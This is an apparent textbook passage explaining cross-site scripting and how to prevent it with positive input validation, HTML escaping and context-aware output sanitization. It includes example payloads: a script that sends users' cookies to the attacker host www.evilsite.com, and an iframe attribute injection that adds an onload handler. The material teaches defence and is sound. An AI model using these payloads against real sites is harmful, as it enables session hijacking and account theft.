Cross-Site Scripting

Not all security problems related to JavaScript are the fault of the browser. Sometimes the creator of a Web application is to blame. Consider a site that accepts a user name in form input and then displays it in the page. Entering the name “Fred” and clicking Submit might result in loading a URL like http://www.example.com/mycgi?username=Fred, and the following snippet of HTML to appear in the resulting page:

Hello, <<b>>Fred<</b>>!

But what happens if someone can get you to click on a link to http://www.example.com/mycgi?username=Fred<<script>>alert(‘Uh oh’);<</script>>? The CGI might write the following HTML into the resulting page:

Hello, <<b>>Fred<<script>>alert('Uh oh');<</script>><</b>>

The script passed in through the username URL parameter was written directly into the page, and its JavaScript is executed as normal.

This exceedingly undesirable behavior is known as cross-site scripting (commonly referred to as XSS). It allows JavaScript created by attackers to be “injected” into pages on your site. The previous example was relatively benign, but the URL could easily have contained more malicious script. For example, consider the following URL:

http://www.example.com/mycgi?username=Fritz%3Cscript%3E%0A%28new%20Image%29.src%3D
%27http%3A//www.evilsite.com/%3Fstolencookie%3D%27+escape%28document.cookie%29%3B%
0A%3C/script%3E

First, note that potentially problematic characters such as <<, :, and ? have been URL encoded so as not to confuse the browser. Now consider the resulting HTML that would be written into the page:

Hello, <<b>>Fritz <<script>>
(new Image).src='http://www.evilsite.com/?stolencookie='+
escape(document.cookie);
<</script>><</b>>

This script causes the browser to try to load an image from www.evilsite.com, and includes in the URL any cookies the user has for the current site (www.example.com). The fact that this image doesn’t exist is not important; the user won’t see it anyway. What is important is to notice that the attacker presumably runs www.evilsite.com, and now only has to look through his logs in order to find cookies that have been stolen from unsuspecting users. Since most sites store login information in cookies, this could potentially let the attacker log in with his victims’ identities.

Cross-site scripting attacks aren’t limited to stealing cookies. Anything undesirable that is prevented by the same origin policy could happen. For example, the script could just as easily have snooped on the user’s keypresses and sent them to www.evilsite.com. The same origin policy doesn’t apply here: the browser has no way of knowing that www.example.com didn’t intend for the script to appear in the page.

Preventing Cross-Site Scripting

You should use a two-pronged approach to preventing cross-site scripting attacks. The first tenet is to always positively validate user input at the server (i.e., in your CGI, PHP, and so on). You should check submitted form values against regular expressions that are known to be “good” (or use equivalent logic to make the determination). This is as opposed to checking values for undesirable characters, which we term “negative” validation. For example, if usernames are supposed to be alphanumeric characters, ensure that inputs match a regular expression such as ^[a-zA-Z0-9]+$ instead of looking for potentially problematic non-alphanumeric characters. Positive matching is superior to negative matching because there’s no opportunity to make a mistake by forgetting to search for a particular “bad” character.

The second approach is to always HTML-escape data before writing it into a Web page. HTML-escaping replaces meaningful HTML characters such as << and >> with their entity equivalents, in this case &lt; and &gt;. Doing so ensures that even if malicious input makes it past your input validation code, it will be rendered harmless when written into the page.

Note that how data must be escaped to be safe for output (termed output sanitization) depends on how it is written into the page. For example, if the user passes in a URL to be written into an <<iframe>>:

<<iframe src="VALUEGOESHERE">> <</iframe>>

An attacker could pass in http://somelegitsite.com"%20onload="evilJSFunction()" as the URL (%20 is a space). This would be decoded and inserted into the page, resulting in:

<<iframe src="http://somelegitsite.com" onload="evilJSFunction()">> <</iframe>>

Merely escaping << and >> is not sufficient; you need to be aware of the context of output as well. A policy of escaping &, <<, >>, and parentheses, as well as single and double quotes, is often the best way to go.

Output sanitization can be tricky, and requires an in-depth knowledge of HTML, CSS, JavaScript, and proprietary browser technologies to be effective. Readers interested in learning more about cross-site scripting and Web application security in general might benefit from reading the Open Web Application Security Project (OWASP) Guide, currently found at http://www.owasp.org/documentation/guide.